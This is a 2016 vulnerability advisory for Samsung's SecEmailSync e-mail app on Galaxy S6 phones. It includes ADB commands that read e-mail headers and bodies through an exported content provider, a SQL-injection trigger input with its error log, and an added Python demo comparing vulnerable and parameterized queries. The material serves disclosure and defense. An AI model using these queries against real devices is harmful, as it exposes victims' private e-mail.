Exposed provider and SQLi in SecEmailSync

  • Authors: Roberto Paleari (@rpaleari) and Aristide Fattori (@joystick)
  • Samsung ID: SVE-2015-5081
  • ID: CVE-2016-2565 and CVE-2016-2566
  • Notification date: 29/10/2015
  • Release date: 02/02/2016

We identified some vulnerabilities and insecure settings in the Samsung proprietary e-mail application, SecEmailSync, distributed with recent Android-based Samsung phones. These vulnerabilities can be exploited by any local application to access a victim's e-mail messages. The attacker app does not require any specific privilege, so the attack is quite stealthy.

Exposed content provider

Recent Samsung Android phones include a proprietary application named SecEmailSync (package com.samsung.android.email.sync). This app exposes multiple services and content providers, some of which are accessible by any unprivileged local application.

Among these, we focused on the content provider .homecard.OtherProvider. The relevant manifest entry follows:

<provider android:authorities="com.samsung.android.email.otherprovider" android:exported="true"
android:name="com.samsung.android.email.sync.homecard.OtherProvider"/>

As can be seen from this snippet, this provider is exported and can thus be queried by any other local application, without requiring any specific privilege (CVE-2016-2565).

We investigated the inner workings of this provider and found that it can be abused to access e-mail messages handled by the Samsung proprietary e-mail application (SecEmail).

As an example, the following ADB command demonstrates how it is possible to query the content provider to extract the e-mails sent by a given sender (in this case, bobby@mysite.it):

$ adb shell content query --uri content://com.samsung.android.email.otherprovider/header --where bobby@mysite.it
Row: 0 timeStamp=1446119267000, subject=Test email, _id=1997

URI content://com.samsung.android.email.otherprovider/body also gives access to the e-mail body:

$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where bobby@mysite.it
Row: 0 htmlContent=NULL, textContent=Email body

It is not even required to know the e-mail address of a valid sender: passing "@" as the e-mail address suffices to match all the available e-mails, since the value is used as a substring pattern.

SQL injection

Even worse, the very same content provider is affected by a SQL injection (SQLi) issue (CVE-2016-2566). As an example, the following query triggers the vulnerability:

$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where "test@me'"

When this query is processed, the following messages are recorded in the Android logs (the logs have been truncated due to space constraints):

E/DatabaseUtils( 5454): android.database.sqlite.SQLiteException: unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454): Error Code : 1 (SQLITE_ERROR)
E/DatabaseUtils( 5454): Caused By : SQL(query) error or missing database.
E/DatabaseUtils( 5454):		(unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10)
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454):		at android.database.sqlite.SQLiteConnection.nativePrepareStatement(Native Method)
....
E/DatabaseUtils( 5454):		at com.samsung.android.email.provider.provider.database.AbsEmailProvider.query(AbsEmailProvider.java:1986)

The SQLi can obviously be exploited to extract arbitrary data from the SQL tables managed by the content provider.
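The log above shows the root cause: the caller-controlled `--where` value is spliced into a `LIKE '%...%'` literal. The following added example (not part of the advisory, and not Samsung's code) reproduces that query pattern against a constructed in-memory SQLite table with the same columns, showing that a single quote breaks the statement exactly as in the log, and places the hardened form next to it: the value is bound as a parameter (the equivalent of `selectionArgs` in Android's `ContentResolver` / `SQLiteDatabase` APIs) and `LIKE` wildcards in caller input are escaped. The table contents and the function names are assumptions.

```python
import sqlite3

# Constructed sample rows mirroring the columns visible in the advisory's log
# (Message table with _id, timeStamp, subject and a fromList column).
SAMPLE_ROWS = [
    (1997, 1446119267000, "Test email", "bobby@mysite.it"),
    (1998, 1446119300000, "Quarterly report", "alice@example.org"),
    (1999, 1446119400000, "Lunch?", "carol@example.org"),
]


def make_db():
    """In-memory SQLite database standing in for the provider's e-mail store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Message (_id INTEGER PRIMARY KEY, "
                 "timeStamp INTEGER, subject TEXT, fromList TEXT)")
    conn.executemany("INSERT INTO Message VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_vulnerable(conn, sender):
    """Same construction as the statement in the log: the caller's value is
    concatenated into the LIKE literal, so a quote changes the SQL itself."""
    sql = ("SELECT timeStamp, subject, _id FROM Message "
           "WHERE (fromList like '%" + sender + "%') "
           "ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10")
    return conn.execute(sql).fetchall()


def query_hardened(conn, sender):
    """Hardened form: the value is bound with '?' so it can never be parsed
    as SQL, and '%', '_' and '\\' in caller input are escaped so they act as
    literal characters rather than LIKE wildcards. Note that any substring
    match still lets a caller pass '@' to match every address; restricting
    who may query the provider (android:exported="false" or a permission)
    is the control for that, not the query itself."""
    escaped = (sender.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    sql = ("SELECT timeStamp, subject, _id FROM Message "
           "WHERE fromList LIKE ? ESCAPE '\\' "
           "ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10")
    return conn.execute(sql, ("%" + escaped + "%",)).fetchall()


def breaks_statement(conn, sender):
    """True if the vulnerable query fails to compile for this input, which is
    the "unrecognized token" error recorded in the advisory's log."""
    try:
        query_vulnerable(conn, sender)
    except sqlite3.OperationalError:
        return True
    return False
```

A detection-side note: the `E/DatabaseUtils` stack trace with `unrecognized token` and the provider's `query` frame is the signal to look for in logcat when auditing a provider for this class of bug.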

Affected devices

We confirmed that these issues affect the following device models. Other models and firmware versions are probably affected as well, but they were not tested.

  • SM-G920F, build G920FXXU2COH2 (Galaxy S6)

The vulnerabilities discussed in this advisory have already been patched by Samsung, in their January Android Security Update (SMR-JAN-2016).